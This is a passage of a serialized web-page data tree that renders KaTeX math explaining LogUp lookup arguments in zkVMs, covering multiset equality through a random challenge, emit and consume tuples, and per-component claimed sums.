",{"type":28,"tag":98,"props":113015,"children":113017},{"className":113016},[3652,3653],[113018],{"type":28,"tag":116,"props":113019,"children":113021},{"className":113020},[3658],[113022],{"type":28,"tag":116,"props":113023,"children":113025},{"className":113024,"ariaHidden":3664},[3663],[113026],{"type":28,"tag":116,"props":113027,"children":113029},{"className":113028},[3669],[113030,113034],{"type":28,"tag":116,"props":113031,"children":113033},{"className":113032,"style":21246},[3674],[],{"type":28,"tag":116,"props":113035,"children":113037},{"className":113036},[3680,21251],[113038],{"type":33,"value":76387},{"type":33,"value":113040}," should equal set ",{"type":28,"tag":98,"props":113042,"children":113044},{"className":113043},[3652,3653],[113045],{"type":28,"tag":116,"props":113046,"children":113048},{"className":113047},[3658],[113049],{"type":28,"tag":116,"props":113050,"children":113052},{"className":113051,"ariaHidden":3664},[3663],[113053],{"type":28,"tag":116,"props":113054,"children":113056},{"className":113055},[3669],[113057,113061],{"type":28,"tag":116,"props":113058,"children":113060},{"className":113059,"style":21246},[3674],[],{"type":28,"tag":116,"props":113062,"children":113065},{"className":113063,"style":113064},[3680,21251],"margin-right:0.05017em;",[113066],{"type":33,"value":113067},"B",{"type":33,"value":113069}," as multisets:",{"type":28,"tag":29,"props":113071,"children":113072},{},[113073],{"type":28,"tag":98,"props":113074,"children":113076},{"className":113075},[3652,3653],[113077],{"type":28,"tag":116,"props":113078,"children":113080},{"className":113079},[3658],[113081],{"type":28,"tag":116,"props":113082,"children":113084},{"className":113083,"ariaHidden":3664},[3663],[113085,113300],{"type":28,"tag":116,"props":113086,"children":113088},{"className":113087},[3669],[113089,113094,113167,113171,113287,113291,113296],{"type":28,"tag":116,"props":113090,"children":113093},{"className":113091,"style":113092},[3674],"height:1.2484em;vertical-align:-0.4033em;",[],{"type":28,"tag":116,"props":113095,"children":113097},{"className":113096},[21287],[113098,113103],{"type":28,"tag":116,"props":113099,"children":113101},{"className":113100,"style":21294},[21287,21292,21293],[113102],{"type":33,"value":108455},{"type":28,"tag":116,"props":113104,"children":113106},{"className":113105},[3695],[113107],{"type":28,"tag":116,"props":113108,"children":113110},{"className":113109},[3700,21305],[113111,113155],{"type":28,"tag":116,"props":113112,"children":113114},{"className":113113},[3705],[113115,113150],{"type":28,"tag":116,"props":113116,"children":113119},{"className":113117,"style":113118},[3710],"height:0.1786em;",[113120],{"type":28,"tag":116,"props":113121,"children":113122},{"style":21318},[113123,113127],{"type":28,"tag":116,"props":113124,"children":113126},{"className":113125,"style":3720},[3719],[],{"type":28,"tag":116,"props":113128,"children":113130},{"className":113129},[3725,3726,3727,3728],[113131],{"type":28,"tag":116,"props":113132,"children":113134},{"className":113133},[3680,3728],[113135,113140,113145],{"type":28,"tag":116,"props":113136,"children":113138},{"className":113137},[3680,21251,3728],[113139],{"type":33,"value":87},{"type":28,"tag":116,"props":113141,"children":113143},{"className":113142},[3862,3728],[113144],{"type":33,"value":21358},{"type":28,"tag":116,"props":113146,"children":113148},{"className":113147},[3680,21251,3728],[113149],{"type":33,"value":76387},{"type":28,"tag":116,"props":113151,"children":113153},{"className":113152},[21407],[113154],{"type":33,"value":21410},{"type":28,"tag":116,"props":113156,"children":113158},{"className":113157},[3705],[113159],{"type":28,"tag":116,"props":113160,"children":113163},{"className":113161,"style":113162},[3710],"height:0.3271em;",[113164],{"type":28,"tag":116,"props":113165,"children":113166},{},[],{"type":28,"tag":116,"props":113168,"children":113170},{"className":113169,"style":3798},[3759],[],{"type":28,"tag":116,"props":113172,"children":113174},{"className":113173},[3680],[113175,113180,113283],{"type":28,"tag":116,"props":113176,"children":113179},{"className":113177},[21380,113178],"nulldelimiter",[],{"type":28,"tag":116,"props":113181,"children":113184},{"className":113182},[113183],"mfrac",[113185],{"type":28,"tag":116,"props":113186,"children":113188},{"className":113187},[3700,21305],[113189,113271],{"type":28,"tag":116,"props":113190,"children":113192},{"className":113191},[3705],[113193,113266],{"type":28,"tag":116,"props":113194,"children":113197},{"className":113195,"style":113196},[3710],"height:0.8451em;",[113198,113231,113245],{"type":28,"tag":116,"props":113199,"children":113201},{"style":113200},"top:-2.655em;",[113202,113206],{"type":28,"tag":116,"props":113203,"children":113205},{"className":113204,"style":111831},[3719],[],{"type":28,"tag":116,"props":113207,"children":113209},{"className":113208},[3725,3726,3727,3728],[113210],{"type":28,"tag":116,"props":113211,"children":113213},{"className":113212},[3680,3728],[113214,113221,113226],{"type":28,"tag":116,"props":113215,"children":113218},{"className":113216,"style":113217},[3680,21251,3728],"margin-right:0.04398em;",[113219],{"type":33,"value":113220},"z",{"type":28,"tag":116,"props":113222,"children":113224},{"className":113223},[3765,3728],[113225],{"type":33,"value":3739},{"type":28,"tag":116,"props":113227,"children":113229},{"className":113228},[3680,21251,3728],[113230],{"type":33,"value":87},{"type":28,"tag":116,"props":113232,"children":113234},{"style":113233},"top:-3.23em;",[113235,113239],{"type":28,"tag":116,"props":113236,"children":113238},{"className":113237,"style":111831},[3719],[],{"type":28,"tag":116,"props":113240,"children":113244},{"className":113241,"style":113243},[113242],"frac-line","border-bottom-width:0.04em;",[],{"type":28,"tag":116,"props":113246,"children":113248},{"style":113247},"top:-3.394em;",[113249,113253],{"type":28,"tag":116,"props":113250,"children":113252},{"className":113251,"style":111831},[3719],[],{"type":28,"tag":116,"props":113254,"children":113256},{"className":113255},[3725,3726,3727,3728],[113257],{"type":28,"tag":116,"props":113258,"children":113260},{"className":113259},[3680,3728],[113261],{"type":28,"tag":116,"props":113262,"children":113264},{"className":113263},[3680,3728],[113265],{"type":33,"value":1824},{"type":28,"tag":116,"props":113267,"children":113269},{"className":113268},[21407],[113270],{"type":33,"value":21410},{"type":28,"tag":116,"props":113272,"children":113274},{"className":113273},[3705],[113275],{"type":28,"tag":116,"props":113276,"children":113279},{"className":113277,"style":113278},[3710],"height:0.4033em;",[113280],{"type":28,"tag":116,"props":113281,"children":113282},{},[],{"type":28,"tag":116,"props":113284,"children":113286},{"className":113285},[21401,113178],[],{"type":28,"tag":116,"props":113288,"children":113290},{"className":113289,"style":3857},[3759],[],{"type":28,"tag":116,"props":113292,"children":113294},{"className":113293},[3862],[113295],{"type":33,"value":373},{"type":28,"tag":116,"props":113297,"children":113299},{"className":113298,"style":3857},[3759],[],{"type":28,"tag":116,"props":113301,"children":113303},{"className":113302},[3669],[113304,113308,113380,113384],{"type":28,"tag":116,"props":113305,"children":113307},{"className":113306,"style":113092},[3674],[],{"type":28,"tag":116,"props":113309,"children":113311},{"className":113310},[21287],[113312,113317],{"type":28,"tag":116,"props":113313,"children":113315},{"className":113314,"style":21294},[21287,21292,21293],[113316],{"type":33,"value":108455},{"type":28,"tag":116,"props":113318,"children":113320},{"className":113319},[3695],[113321],{"type":28,"tag":116,"props":113322,"children":113324},{"className":113323},[3700,21305],[113325,113369],{"type":28,"tag":116,"props":113326,"children":113328},{"className":113327},[3705],[113329,113364],{"type":28,"tag":116,"props":113330,"children":113333},{"className":113331,"style":113332},[3710],"height:0.1864em;",[113334],{"type":28,"tag":116,"props":113335,"children":113336},{"style":21318},[113337,113341],{"type":28,"tag":116,"props":113338,"children":113340},{"className":113339,"style":3720},[3719],[],{"type":28,"tag":116,"props":113342,"children":113344},{"className":113343},[3725,3726,3727,3728],[113345],{"type":28,"tag":116,"props":113346,"children":113348},{"className":113347},[3680,3728],[113349,113354,113359],{"type":28,"tag":116,"props":113350,"children":113352},{"className":113351},[3680,21251,3728],[113353],{"type":33,"value":2893},{"type":28,"tag":116,"props":113355,"children":113357},{"className":113356},[3862,3728],[113358],{"type":33,"value":21358},{"type":28,"tag":116,"props":113360,"children":113362},{"className":113361,"style":113064},[3680,21251,3728],[113363],{"type":33,"value":113067},{"type":28,"tag":116,"props":113365,"children":113367},{"className":113366},[21407],[113368],{"type":33,"value":21410},{"type":28,"tag":116,"props":113370,"children":113372},{"className":113371},[3705],[113373],{"type":28,"tag":116,"props":113374,"children":113376},{"className":113375,"style":113162},[3710],[113377],{"type":28,"tag":116,"props":113378,"children":113379},{},[],{"type":28,"tag":116,"props":113381,"children":113383},{"className":113382,"style":3798},[3759],[],{"type":28,"tag":116,"props":113385,"children":113387},{"className":113386},[3680],[113388,113392,113485],{"type":28,"tag":116,"props":113389,"children":113391},{"className":113390},[21380,113178],[],{"type":28,"tag":116,"props":113393,"children":113395},{"className":113394},[113183],[113396],{"type":28,"tag":116,"props":113397,"children":113399},{"className":113398},[3700,21305],[113400,113474],{"type":28,"tag":116,"props":113401,"children":113403},{"className":113402},[3705],[113404,113469],{"type":28,"tag":116,"props":113405,"children":113407},{"className":113406,"style":113196},[3710],[113408,113438,113449],{"type":28,"tag":116,"props":113409,"children":113410},{"style":113200},[113411,113415],{"type":28,"tag":116,"props":113412,"children":113414},{"className":113413,"style":111831},[3719],[],{"type":28,"tag":116,"props":113416,"children":113418},{"className":113417},[3725,3726,3727,3728],[113419],{"type":28,"tag":116,"props":113420,"children":113422},{"className":113421},[3680,3728],[113423,113428,113433],{"type":28,"tag":116,"props":113424,"children":113426},{"className":113425,"style":113217},[3680,21251,3728],[113427],{"type":33,"value":113220},{"type":28,"tag":116,"props":113429,"children":113431},{"className":113430},[3765,3728],[113432],{"type":33,"value":3739},{"type":28,"tag":116,"props":113434,"children":113436},{"className":113435},[3680,21251,3728],[113437],{"type":33,"value":2893},{"type":28,"tag":116,"props":113439,"children":113440},{"style":113233},[113441,113445],{"type":28,"tag":116,"props":113442,"children":113444},{"className":113443,"style":111831},[3719],[],{"type":28,"tag":116,"props":113446,"children":113448},{"className":113447,"style":113243},[113242],[],{"type":28,"tag":116,"props":113450,"children":113451},{"style":113247},[113452,113456],{"type":28,"tag":116,"props":113453,"children":113455},{"className":113454,"style":111831},[3719],[],{"type":28,"tag":116,"props":113457,"children":113459},{"className":113458},[3725,3726,3727,3728],[113460],{"type":28,"tag":116,"props":113461,"children":113463},{"className":113462},[3680,3728],[113464],{"type":28,"tag":116,"props":113465,"children":113467},{"className":113466},[3680,3728],[113468],{"type":33,"value":1824},{"type":28,"tag":116,"props":113470,"children":113472},{"className":113471},[21407],[113473],{"type":33,"value":21410},{"type":28,"tag":116,"props":113475,"children":113477},{"className":113476},[3705],[113478],{"type":28,"tag":116,"props":113479,"children":113481},{"className":113480,"style":113278},[3710],[113482],{"type":28,"tag":116,"props":113483,"children":113484},{},[],{"type":28,"tag":116,"props":113486,"children":113488},{"className":113487},[21401,113178],[],{"type":28,"tag":29,"props":113490,"children":113491},{},[113492,113494,113519],{"type":33,"value":113493},"for random challenge ",{"type":28,"tag":98,"props":113495,"children":113497},{"className":113496},[3652,3653],[113498],{"type":28,"tag":116,"props":113499,"children":113501},{"className":113500},[3658],[113502],{"type":28,"tag":116,"props":113503,"children":113505},{"className":113504,"ariaHidden":3664},[3663],[113506],{"type":28,"tag":116,"props":113507,"children":113509},{"className":113508},[3669],[113510,113514],{"type":28,"tag":116,"props":113511,"children":113513},{"className":113512,"style":110501},[3674],[],{"type":28,"tag":116,"props":113515,"children":113517},{"className":113516,"style":113217},[3680,21251],[113518],{"type":33,"value":113220},{"type":33,"value":113520},". If the multisets match, the sums are equal. If they differ, the sums differ with overwhelming probability.",{"type":28,"tag":29,"props":113522,"children":113523},{},[113524,113529],{"type":28,"tag":4995,"props":113525,"children":113526},{},[113527],{"type":33,"value":113528},"In zkVMs:",{"type":33,"value":113530}," Different components emit and consume lookup tuples:",{"type":28,"tag":2108,"props":113532,"children":113533},{},[113534,113621],{"type":28,"tag":459,"props":113535,"children":113536},{},[113537,113539,113565,113567,113592,113594,113620],{"type":33,"value":113538},"CPU emits: \"I read value ",{"type":28,"tag":98,"props":113540,"children":113542},{"className":113541},[3652,3653],[113543],{"type":28,"tag":116,"props":113544,"children":113546},{"className":113545},[3658],[113547],{"type":28,"tag":116,"props":113548,"children":113550},{"className":113549,"ariaHidden":3664},[3663],[113551],{"type":28,"tag":116,"props":113552,"children":113554},{"className":113553},[3669],[113555,113559],{"type":28,"tag":116,"props":113556,"children":113558},{"className":113557,"style":110501},[3674],[],{"type":28,"tag":116,"props":113560,"children":113562},{"className":113561,"style":93149},[3680,21251],[113563],{"type":33,"value":113564},"v",{"type":33,"value":113566}," from address ",{"type":28,"tag":98,"props":113568,"children":113570},{"className":113569},[3652,3653],[113571],{"type":28,"tag":116,"props":113572,"children":113574},{"className":113573},[3658],[113575],{"type":28,"tag":116,"props":113576,"children":113578},{"className":113577,"ariaHidden":3664},[3663],[113579],{"type":28,"tag":116,"props":113580,"children":113582},{"className":113581},[3669],[113583,113587],{"type":28,"tag":116,"props":113584,"children":113586},{"className":113585,"style":110501},[3674],[],{"type":28,"tag":116,"props":113588,"children":113590},{"className":113589},[3680,21251],[113591],{"type":33,"value":87},{"type":33,"value":113593}," at time ",{"type":28,"tag":98,"props":113595,"children":113597},{"className":113596},[3652,3653],[113598],{"type":28,"tag":116,"props":113599,"children":113601},{"className":113600},[3658],[113602],{"type":28,"tag":116,"props":113603,"children":113605},{"className":113604,"ariaHidden":3664},[3663],[113606],{"type":28,"tag":116,"props":113607,"children":113609},{"className":113608},[3669],[113610,113615],{"type":28,"tag":116,"props":113611,"children":113614},{"className":113612,"style":113613},[3674],"height:0.6151em;",[],{"type":28,"tag":116,"props":113616,"children":113618},{"className":113617},[3680,21251],[113619],{"type":33,"value":1554},{"type":33,"value":2240},{"type":28,"tag":459,"props":113622,"children":113623},{},[113624,113626,113651,113653,113678,113680,113705],{"type":33,"value":113625},"Memory table consumes: \"At time ",{"type":28,"tag":98,"props":113627,"children":113629},{"className":113628},[3652,3653],[113630],{"type":28,"tag":116,"props":113631,"children":113633},{"className":113632},[3658],[113634],{"type":28,"tag":116,"props":113635,"children":113637},{"className":113636,"ariaHidden":3664},[3663],[113638],{"type":28,"tag":116,"props":113639,"children":113641},{"className":113640},[3669],[113642,113646],{"type":28,"tag":116,"props":113643,"children":113645},{"className":113644,"style":113613},[3674],[],{"type":28,"tag":116,"props":113647,"children":113649},{"className":113648},[3680,21251],[113650],{"type":33,"value":1554},{"type":33,"value":113652},", address ",{"type":28,"tag":98,"props":113654,"children":113656},{"className":113655},[3652,3653],[113657],{"type":28,"tag":116,"props":113658,"children":113660},{"className":113659},[3658],[113661],{"type":28,"tag":116,"props":113662,"children":113664},{"className":113663,"ariaHidden":3664},[3663],[113665],{"type":28,"tag":116,"props":113666,"children":113668},{"className":113667},[3669],[113669,113673],{"type":28,"tag":116,"props":113670,"children":113672},{"className":113671,"style":110501},[3674],[],{"type":28,"tag":116,"props":113674,"children":113676},{"className":113675},[3680,21251],[113677],{"type":33,"value":87},{"type":33,"value":113679}," contained ",{"type":28,"tag":98,"props":113681,"children":113683},{"className":113682},[3652,3653],[113684],{"type":28,"tag":116,"props":113685,"children":113687},{"className":113686},[3658],[113688],{"type":28,"tag":116,"props":113689,"children":113691},{"className":113690,"ariaHidden":3664},[3663],[113692],{"type":28,"tag":116,"props":113693,"children":113695},{"className":113694},[3669],[113696,113700],{"type":28,"tag":116,"props":113697,"children":113699},{"className":113698,"style":110501},[3674],[],{"type":28,"tag":116,"props":113701,"children":113703},{"className":113702,"style":93149},[3680,21251],[113704],{"type":33,"value":113564},{"type":33,"value":2240},{"type":28,"tag":29,"props":113707,"children":113708},{},[113709],{"type":33,"value":113710},"If everything balances, the execution is consistent.",{"type":28,"tag":29,"props":113712,"children":113713},{},[113714,113719],{"type":28,"tag":4995,"props":113715,"children":113716},{},[113717],{"type":33,"value":113718},"The claimed_sum:",{"type":33,"value":113720}," Each component computes its contribution to the LogUp sum:",{"type":28,"tag":29,"props":113722,"children":113723},{},[113724],{"type":28,"tag":98,"props":113725,"children":113727},{"className":113726},[3652,3653],[113728],{"type":28,"tag":116,"props":113729,"children":113731},{"className":113730},[3658],[113732],{"type":28,"tag":116,"props":113733,"children":113735},{"className":113734,"ariaHidden":3664},[3663],[113736,113834,114085],{"type":28,"tag":116,"props":113737,"children":113739},{"className":113738},[3669],[113740,113744,113754,113759,113821,113825,113830],{"type":28,"tag":116,"props":113741,"children":113743},{"className":113742,"style":94076},[3674],[],{"type":28,"tag":116,"props":113745,"children":113747},{"className":113746},[3680,33],[113748],{"type":28,"tag":116,"props":113749,"children":113751},{"className":113750},[3680],[113752],{"type":33,"value":113753},"claimed",{"type":28,"tag":116,"props":113755,"children":113757},{"className":113756,"style":92663},[3680],[113758],{"type":33,"value":2754},{"type":28,"tag":116,"props":113760,"children":113762},{"className":113761},[3680],[113763,113772],{"type":28,"tag":116,"props":113764,"children":113766},{"className":113765},[3680,33],[113767],{"type":28,"tag":116,"props":113768,"children":113770},{"className":113769},[3680],[113771],{"type":33,"value":76252},{"type":28,"tag":116,"props":113773,"children":113775},{"className":113774},[3695],[113776],{"type":28,"tag":116,"props":113777,"children":113779},{"className":113778},[3700,21305],[113780,113810],{"type":28,"tag":116,"props":113781,"children":113783},{"className":113782},[3705],[113784,113805],{"type":28,"tag":116,"props":113785,"children":113787},{"className":113786,"style":93192},[3710],[113788],{"type":28,"tag":116,"props":113789,"children":113791},{"style":113790},"top:-2.55em;margin-right:0.05em;",[113792,113796],{"type":28,"tag":116,"props":113793,"children":113795},{"className":113794,"style":3720},[3719],[],{"type":28,"tag":116,"props":113797,"children":113799},{"className":113798},[3725,3726,3727,3728],[113800],{"type":28,"tag":116,"props":113801,"children":113803},{"className":113802},[3680,21251,3728],[113804],{"type":33,"value":3408},{"type":28,"tag":116,"props":113806,"children":113808},{"className":113807},[21407],[113809],{"type":33,"value":21410},{"type":28,"tag":116,"props":113811,"children":113813},{"className":113812},[3705],[113814],{"type":28,"tag":116,"props":113815,"children":113817},{"className":113816,"style":92746},[3710],[113818],{"type":28,"tag":116,"props":113819,"children":113820},{},[],{"type":28,"tag":116,"props":113822,"children":113824},{"className":113823,"style":3857},[3759],[],{"type":28,"tag":116,"props":113826,"children":113828},{"className":113827},[3862],[113829],{"type":33,"value":373},{"type":28,"tag":116,"props":113831,"children":113833},{"className":113832,"style":3857},[3759],[],{"type":28,"tag":116,"props":113835,"children":113837},{"className":113836},[3669],[113838,113843,113903,113907,114072,114076,114081],{"type":28,"tag":116,"props":113839,"children":113842},{"className":113840,"style":113841},[3674],"height:1.3874em;vertical-align:-0.5423em;",[],{"type":28,"tag":116,"props":113844,"children":113846},{"className":113845},[21287],[113847,113852],{"type":28,"tag":116,"props":113848,"children":113850},{"className":113849,"style":21294},[21287,21292,21293],[113851],{"type":33,"value":108455},{"type":28,"tag":116,"props":113853,"children":113855},{"className":113854},[3695],[113856],{"type":28,"tag":116,"props":113857,"children":113859},{"className":113858},[3700,21305],[113860,113891],{"type":28,"tag":116,"props":113861,"children":113863},{"className":113862},[3705],[113864,113886],{"type":28,"tag":116,"props":113865,"children":113868},{"className":113866,"style":113867},[3710],"height:0.162em;",[113869],{"type":28,"tag":116,"props":113870,"children":113871},{"style":21318},[113872,113876],{"type":28,"tag":116,"props":113873,"children":113875},{"className":113874,"style":3720},[3719],[],{"type":28,"tag":116,"props":113877,"children":113879},{"className":113878},[3725,3726,3727,3728],[113880],{"type":28,"tag":116,"props":113881,"children":113884},{"className":113882,"style":113883},[3680,21251,3728],"margin-right:0.05724em;",[113885],{"type":33,"value":8328},{"type":28,"tag":116,"props":113887,"children":113889},{"className":113888},[21407],[113890],{"type":33,"value":21410},{"type":28,"tag":116,"props":113892,"children":113894},{"className":113893},[3705],[113895],{"type":28,"tag":116,"props":113896,"children":113899},{"className":113897,"style":113898},[3710],"height:0.4358em;",[113900],{"type":28,"tag":116,"props":113901,"children":113902},{},[],{"type":28,"tag":116,"props":113904,"children":113906},{"className":113905,"style":3798},[3759],[],{"type":28,"tag":116,"props":113908,"children":113910},{"className":113909},[3680],[113911,113915,114068],{"type":28,"tag":116,"props":113912,"children":113914},{"className":113913},[21380,113178],[],{"type":28,"tag":116,"props":113916,"children":113918},{"className":113917},[113183],[113919],{"type":28,"tag":116,"props":113920,"children":113922},{"className":113921},[3700,21305],[113923,114056],{"type":28,"tag":116,"props":113924,"children":113926},{"className":113925},[3705],[113927,114051],{"type":28,"tag":116,"props":113928,"children":113930},{"className":113929,"style":113196},[3710],[113931,114020,114031],{"type":28,"tag":116,"props":113932,"children":113933},{"style":113200},[113934,113938],{"type":28,"tag":116,"props":113935,"children":113937},{"className":113936,"style":111831},[3719],[],{"type":28,"tag":116,"props":113939,"children":113941},{"className":113940},[3725,3726,3727,3728],[113942],{"type":28,"tag":116,"props":113943,"children":113945},{"className":113944},[3680,3728],[113946,113951,113956],{"type":28,"tag":116,"props":113947,"children":113949},{"className":113948,"style":113217},[3680,21251,3728],[113950],{"type":33,"value":113220},{"type":28,"tag":116,"props":113952,"children":113954},{"className":113953},[3765,3728],[113955],{"type":33,"value":3739},{"type":28,"tag":116,"props":113957,"children":113959},{"className":113958},[3680,3728],[113960,113969],{"type":28,"tag":116,"props":113961,"children":113963},{"className":113962},[3680,33,3728],[113964],{"type":28,"tag":116,"props":113965,"children":113967},{"className":113966},[3680,3728],[113968],{"type":33,"value":61627},{"type":28,"tag":116,"props":113970,"children":113972},{"className":113971},[3695],[113973],{"type":28,"tag":116,"props":113974,"children":113976},{"className":113975},[3700,21305],[113977,114008],{"type":28,"tag":116,"props":113978,"children":113980},{"className":113979},[3705],[113981,114003],{"type":28,"tag":116,"props":113982,"children":113985},{"className":113983,"style":113984},[3710],"height:0.3281em;",[113986],{"type":28,"tag":116,"props":113987,"children":113989},{"style":113988},"top:-2.357em;margin-right:0.0714em;",[113990,113994],{"type":28,"tag":116,"props":113991,"children":113993},{"className":113992,"style":108520},[3719],[],{"type":28,"tag":116,"props":113995,"children":113997},{"className":113996},[3725,108525,108526,3728],[113998],{"type":28,"tag":116,"props":113999,"children":114001},{"className":114000,"style":113883},[3680,21251,3728],[114002],{"type":33,"value":8328},{"type":28,"tag":116,"props":114004,"children":114006},{"className":114005},[21407],[114007],{"type":33,"value":21410},{"type":28,"tag":116,"props":114009,"children":114011},{"className":114010},[3705],[114012],{"type":28,"tag":116,"props":114013,"children":114016},{"className":114014,"style":114015},[3710],"height:0.2819em;",[114017],{"type":28,"tag":116,"props":114018,"children":114019},{},[],{"type":28,"tag":116,"props":114021,"children":114022},{"style":113233},[114023,114027],{"type":28,"tag":116,"props":114024,"children":114026},{"className":114025,"style":111831},[3719],[],{"type":28,"tag":116,"props":114028,"children":114030},{"className":114029,"style":113243},[113242],[],{"type":28,"tag":116,"props":114032,"children":114033},{"style":113247},[114034,114038],{"type":28,"tag":116,"props":114035,"children":114037},{"className":114036,"style":111831},[3719],[],{"type":28,"tag":116,"props":114039,"children":114041},{"className":114040},[3725,3726,3727,3728],[114042],{"type":28,"tag":116,"props":114043,"children":114045},{"className":114044},[3680,3728],[114046],{"type":28,"tag":116,"props":114047,"children":114049},{"className":114048},[3680,3728],[114050],{"type":33,"value":1824},{"type":28,"tag":116,"props":114052,"children":114054},{"className":114053},[21407],[114055],{"type":33,"value":21410},{"type":28,"tag":116,"props":114057,"children":114059},{"className":114058},[3705],[114060],{"type":28,"tag":116,"props":114061,"children":114064},{"className":114062,"style":114063},[3710],"height:0.5423em;",[114065],{"type":28,"tag":116,"props":114066,"children":114067},{},[],{"type":28,"tag":116,"props":114069,"children":114071},{"className":114070},[21401,113178],[],{"type":28,"tag":116,"props":114073,"children":114075},{"className":114074,"style":3760},[3759],[],{"type":28,"tag":116,"props":114077,"children":114079},{"className":114078},[3765],[114080],{"type":33,"value":3739},{"type":28,"tag":116,"props":114082,"children":114084},{"className":114083,"style":3760},[3759],[],{"type":28,"tag":116,"props":114086,"children":114088},{"className":114087},[3669],[114089,114094,114152,114156],{"type":28,"tag":116,"props":114090,"children":114093},{"className":114091,"style":114092},[3674],"height:1.296em;vertical-align:-0.4509em;",[],{"type":28,"tag":116,"props":114095,"children":114097},{"className":114096},[21287],[114098,114103],{"type":28,"tag":116,"props":114099,"children":114101},{"className":114100,"style":21294},[21287,21292,21293],[114102],{"type":33,"value":108455},{"type":28,"tag":116,"props":114104,"children":114106},{"className":114105},[3695],[114107],{"type":28,"tag":116,"props":114108,"children":114110},{"className":114109},[3700,21305],[114111,114140],{"type":28,"tag":116,"props":114112,"children":114114},{"className":114113},[3705],[114115,114135],{"type":28,"tag":116,"props":114116,"children":114118},{"className":114117,"style":113332},[3710],[114119],{"type":28,"tag":116,"props":114120,"children":114121},{"style":21318},[114122,114126],{"type":28,"tag":116,"props":114123,"children":114125},{"className":114124,"style":3720},[3719],[],{"type":28,"tag":116,"props":114127,"children":114129},{"className":114128},[3725,3726,3727,3728],[114130],{"type":28,"tag":116,"props":114131,"children":114133},{"className":114132,"style":94092},[3680,21251,3728],[114134],{"type":33,"value":88302},{"type":28,"tag":116,"props":114136,"children":114138},{"className":114137},[21407],[114139],{"type":33,"value":21410},{"type":28,"tag":116,"props":114141,"children":114143},{"className":114142},[3705],[114144],{"type":28,"tag":116,"props":114145,"children":114148},{"className":114146,"style":114147},[3710],"height:0.2997em;",[114149],{"type":28,"tag":116,"props":114150,"children":114151},{},[],{"type":28,"tag":116,"props":114153,"children":114155},{"className":114154,"style":3798},[3759],[],{"type":28,"tag":116,"props":114157,"children":114159},{"className":114158},[3680],[114160,114164,114317],{"type":28,"tag":116,"props":114161,"children":114163},{"className":114162},[21380,113178],[],{"type":28,"tag":116,"props":114165,"children":114167},{"className":114166},[113183],[114168],{"type":28,"tag":116,"props":114169,"children":114171},{"className":114170},[3700,21305],[114172,114305],{"type":28,"tag":116,"props":114173,"children":114175},{"className":114174},[3705],[114176,114300],{"type":28,"tag":116,"props":114177,"children":114179},{"className":114178,"style":113196},[3710],[114180,114269,114280],{"type":28,"tag":116,"props":114181,"children":114182},{"style":113200},[114183,114187],{"type":28,"tag":116,"props":114184,"children":114186},{"className":114185,"style":111831},[3719],[],{"type":28,"tag":116,"props":114188,"children":114190},{"className":114189},[3725,3726,3727,3728],[114191],{"type":28,"tag":116,"props":114192,"children":114194},{"className":114193},[3680,3728],[114195,114200,114205],{"type":28,"tag":116,"props":114196,"children":114198},{"className":114197,"style":113217},[3680,21251,3728],[114199],{"type":33,"value":113220},{"type":28,"tag":116,"props":114201,"children":114203},{"className":114202},[3765,3728],[114204],{"type":33,"value":3739},{"type":28,"tag":116,"props":114206,"children":114208},{"className":114207},[3680,3728],[114209,114219],{"type":28,"tag":116,"props":114210,"children":114212},{"className":114211},[3680,33,3728],[114213],{"type":28,"tag":116,"props":114214,"children":114216},{"className":114215},[3680,3728],[114217],{"type":33,"value":114218},"consume",{"type":28,"tag":116,"props":114220,"children":114222},{"className":114221},[3695],[114223],{"type":28,"tag":116,"props":114224,"children":114226},{"className":114225},[3700,21305],[114227,114257],{"type":28,"tag":116,"props":114228,"children":114230},{"className":114229},[3705],[114231,114252],{"type":28,"tag":116,"props":114232,"children":114234},{"className":114233,"style":111992},[3710],[114235],{"type":28,"tag":116,"props":114236,"children":114238},{"style":114237},"top:-2.3488em;margin-right:0.0714em;",[114239,114243],{"type":28,"tag":116,"props":114240,"children":114242},{"className":114241,"style":108520},[3719],[],{"type":28,"tag":116,"props":114244,"children":114246},{"className":114245},[3725,108525,108526,3728],[114247],{"type":28,"tag":116,"props":114248,"children":114250},{"className":114249,"style":94092},[3680,21251,3728],[114251],{"type":33,"value":88302},{"type":28,"tag":116,"props":114253,"children":114255},{"className":114254},[21407],[114256],{"type":33,"value":21410},{"type":28,"tag":116,"props":114258,"children":114260},{"className":114259},[3705],[114261],{"type":28,"tag":116,"props":114262,"children":114265},{"className":114263,"style":114264},[3710],"height:0.1512em;",[114266],{"type":28,"tag":116,"props":114267,"children":114268},{},[],{"type":28,"tag":116,"props":114270,"children":114271},{"style":113233},[114272,114276],{"type":28,"tag":116,"props":114273,"children":114275},{"className":114274,"style":111831},[3719],[],{"type":28,"tag":116,"props":114277,"children":114279},{"className":114278,"style":113243},[113242],[],{"type":28,"tag":116,"props":114281,"children":114282},{"style":113247},[114283,114287],{"type":28,"tag":116,"props":114284,"children":114286},{"className":114285,"style":111831},[3719],[],{"type":28,"tag":116,"props":114288,"children":114290},{"className":114289},[3725,3726,3727,3728],[114291],{"type":28,"tag":116,"props":114292,"children":114294},{"className":114293},[3680,3728],[114295],{"type":28,"tag":116,"props":114296,"children":114298},{"className":114297},[3680,3728],[114299],{"type":33,"value":1824},{"type":28,"tag":116,"props":114301,"children":114303},{"className":114302},[21407],[114304],{"type":33,"value":21410},{"type":28,"tag":116,"props":114306,"children":114308},{"className":114307},[3705],[114309],{"type":28,"tag":116,"props":114310,"children":114313},{"className":114311,"style":114312},[3710],"height:0.4509em;",[114314],{"type":28,"tag":116,"props":114315,"children":114316},{},[],{"type":28,"tag":116,"props":114318,"children":114320},{"className":114319},[21401,113178],[],{"type":28,"tag":29,"props":114322,"children":114323},{},[114324,114326,114508],{"type":33,"value":114325},"The global check: ",{"type":28,"tag":98,"props":114327,"children":114329},{"className":114328},[3652,3653],[114330],{"type":28,"tag":116,"props":114331,"children":114333},{"className":114332},[3658],[114334],{"type":28,"tag":116,"props":114335,"children":114337},{"className":114336,"ariaHidden":3664},[3663],[114338,114495],{"type":28,"tag":116,"props":114339,"children":114341},{"className":114340},[3669],[114342,114346,114403,114407,114416,114421,114482,114486,114491],{"type":28,"tag":116,"props":114343,"children":114345},{"className":114344,"style":92605},[3674],[],{"type":28,"tag":116,"props":114347,"children":114349},{"className":114348},[21287],[114350,114355],{"type":28,"tag":116,"props":114351,"children":114353},{"className":114352,"style":21294},[21287,21292,21293],[114354],{"type":33,"value":108455},{"type":28,"tag":116,"props":114356,"children":114358},{"className":114357},[3695],[114359],{"type":28,"tag":116,"props":114360,"children":114362},{"className":114361},[3700,21305],[114363,114392],{"type":28,"tag":116,"props":114364,"children":114366},{"className":114365},[3705],[114367,114387],{"type":28,"ta